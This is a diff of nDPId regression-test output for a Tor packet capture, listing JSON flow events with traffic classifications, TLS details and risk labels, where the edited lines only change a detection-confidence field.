{"version":"TLSv1","client_requested_server_name":"www.ct7ctrgb6cr7.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.xkgk7fdx362yyyxib.com","subjectDN":"CN=www.g6ghvisevf3ibuu5.net","fingerprint":"94:F9:FF:E2:7F:DB:1F:B8:19:65:20:6F:F6:DE:B6:A5:D5:AF:14:C7"}} +00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383821665420,"flow_last_seen":1383821665498,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1383821665498,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51110,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.ct7ctrgb6cr7.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01153{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383821665420,"flow_last_seen":1383821665606,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":748,"flow_tot_l4_payload_len":963,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1383821665606,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51110,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.ct7ctrgb6cr7.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.xkgk7fdx362yyyxib.com","subjectDN":"CN=www.g6ghvisevf3ibuu5.net","fingerprint":"94:F9:FF:E2:7F:DB:1F:B8:19:65:20:6F:F6:DE:B6:A5:D5:AF:14:C7"}} 00178{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":25,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821666212} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":25,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821666164,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821666407,"flow_last_seen":1383821666407,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383821666407,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1383821666407,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821666407,"pkt":"UlQA2EYhUlQAWul3CABFAAA0A2hAAIAG0l3AqAH8Ljs0H8enAbvpjJYYAAAAAIACIADhCQAAAgQFtAEDAwgBAQQC"} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1383821666480,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821666480,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAACwGKcYuOzQfwKgB\/AG7x6cxNPZ86YyWGYASchBnNQAAAgQFtAEBBAIBAwMK"} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1383821666481,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383821666481,"pkt":"UlQA2EYhUlQAWul3CABFAAAoA2lAAIAG0mjAqAH8Ljs0H8enAbvpjJYZMTT2fVAQAQAZGwAAAAAAAAAA"} -01188{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383821666407,"flow_last_seen":1383821666482,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1383821666482,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.e6r5p57kbafwrxj3plz.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01400{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":32,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383821666407,"flow_last_seen":1383821666558,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":749,"flow_tot_l4_payload_len":971,"flow_avg_l4_payload_len":161,"midstream":0,"thread_ts_msec":1383821666558,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.e6r5p57kbafwrxj3plz.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.gmvuy6mtjbxevwo3w.com","subjectDN":"CN=www.bpcau5b3haif5els.net","fingerprint":"3A:B1:8A:6F:C3:F6:41:ED:77:D5:40:C3:85:79:8B:62:46:BC:65:9C"}} +01188{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383821666407,"flow_last_seen":1383821666482,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1383821666482,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.e6r5p57kbafwrxj3plz.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01400{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":32,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383821666407,"flow_last_seen":1383821666558,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":749,"flow_tot_l4_payload_len":971,"flow_avg_l4_payload_len":161,"midstream":0,"thread_ts_msec":1383821666558,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.e6r5p57kbafwrxj3plz.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.gmvuy6mtjbxevwo3w.com","subjectDN":"CN=www.bpcau5b3haif5els.net","fingerprint":"3A:B1:8A:6F:C3:F6:41:ED:77:D5:40:C3:85:79:8B:62:46:BC:65:9C"}} 00178{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":55,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821668212} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":55,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821668066,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821668403,"flow_last_seen":1383821668403,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383821668403,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1383821668403,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821668403,"pkt":"UlQA2EYhUlQAWul3CABFAAA0A3VAAIAGx5DAqAH8JuVGNceoAbuUs9YxAAAAAIACIADrCAAAAgQFtAEDAwgBAQQC"} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1383821668547,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821668547,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAADQGFwYm5UY1wKgB\/AG7x6iEDREglLPWMoASOQg8wAAAAgQFtAEBBAIBAwMK"} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1383821668548,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383821668548,"pkt":"UlQA2EYhUlQAWul3CABFAAAoA3ZAAIAGx5vAqAH8JuVGNceoAbuUs9YyhA0RIVAQAQC1nQAAAAAAAAAA"} -01191{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383821668403,"flow_last_seen":1383821668548,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":224,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1383821668548,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.q4cyamnc6mtokjurvdclt.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383821668403,"flow_last_seen":1383821668700,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":929,"flow_tot_l4_payload_len":1153,"flow_avg_l4_payload_len":192,"midstream":0,"thread_ts_msec":1383821668700,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.q4cyamnc6mtokjurvdclt.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"e1691a31bfe345d2692da75636ddfb00","unsafe_cipher":0,"cipher":"TLS_DHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"CN=www.gg562izcxdvqdk.com","subjectDN":"CN=www.fcsyvnlemwxv5p.net","fingerprint":"C1:93:18:2C:A3:1D:AC:5F:C7:DE:17:8A:4E:B1:E8:13:BB:08:73:3A"}} +01191{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383821668403,"flow_last_seen":1383821668548,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":224,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1383821668548,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.q4cyamnc6mtokjurvdclt.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383821668403,"flow_last_seen":1383821668700,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":929,"flow_tot_l4_payload_len":1153,"flow_avg_l4_payload_len":192,"midstream":0,"thread_ts_msec":1383821668700,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.q4cyamnc6mtokjurvdclt.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"e1691a31bfe345d2692da75636ddfb00","unsafe_cipher":0,"cipher":"TLS_DHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"CN=www.gg562izcxdvqdk.com","subjectDN":"CN=www.fcsyvnlemwxv5p.net","fingerprint":"C1:93:18:2C:A3:1D:AC:5F:C7:DE:17:8A:4E:B1:E8:13:BB:08:73:3A"}} 00178{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":80,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821670213} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":80,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821669834,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00178{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":83,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821672213} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":83,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821669834,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":86,"source":"tor.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821673254,"flow_last_seen":1383821673254,"flow_idle_time":200000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1383821673254,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00632{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"tor.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1383821673254,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":186,"pkt_l4_len":152,"thread_ts_msec":1383821673254,"pkt":"\/\/\/\/\/\/\/\/UlQAwqwfCABFAACsAABAAEARtfDAqAEBwKgB\/0RcRFwAmDDeeyJob3N0X2ludCI6IDY3Njg3OTk3NiwgInZlcnNpb24iOiBbMSwgOF0sICJkaXNwbGF5bmFtZSI6ICI2NzY4Nzk5NzYiLCAicG9ydCI6IDE3NTAwLCAibmFtZXNwYWNlcyI6IFsxNjc4NDEyMTYsIDE4MTA4Mzk2OCwgMTgxMDgwMzI0LCAyOTU0NDE3M119"} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"tor.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821673254,"flow_last_seen":1383821673254,"flow_idle_time":200000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1383821673254,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"tor.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821673254,"flow_last_seen":1383821673254,"flow_idle_time":200000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1383821673254,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00178{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":87,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821674212} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":87,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821673254,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00178{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":88,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821676212} @@ -57,7 +57,7 @@ 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":96,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821673254,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"tor.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821693159,"flow_last_seen":1383821693159,"flow_idle_time":200000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":210,"midstream":0,"thread_ts_msec":1383821693159,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00720{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"tor.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1383821693159,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":252,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":252,"pkt_l4_len":218,"thread_ts_msec":1383821693159,"pkt":"\/\/\/\/\/\/\/\/UlQAWul3CABFAADuA4EAAIARsTLAqAH8wKgB\/wCKAIoA2itVEQLJT8CoAfwAigDEAAAgRUZFT0VFRUpFQkVPQ05GQUVEQ0FDQUNBQ0FDQUNBQUEAIEFCQUNGUEZQRU5GREVDRkNFUEZIRkRFRkZQRlBBQ0FCAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAKgAAAAAAAAAAAOgDAAAAAAAAAAAqAFYAAwABAAEAAgA7AFxNQUlMU0xPVFxCUk9XU0UADACguw0AV09SS0dST1VQAAAAAAAAAAMKABAAgP4HAABFTkRJQU4tUEMA"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"tor.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821693159,"flow_last_seen":1383821693159,"flow_idle_time":200000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":210,"midstream":0,"thread_ts_msec":1383821693159,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"tor.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821693159,"flow_last_seen":1383821693159,"flow_idle_time":200000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":210,"midstream":0,"thread_ts_msec":1383821693159,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00178{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":98,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821694212} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":98,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821693159,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00178{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":99,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821696212} @@ -170,27 +170,27 @@ 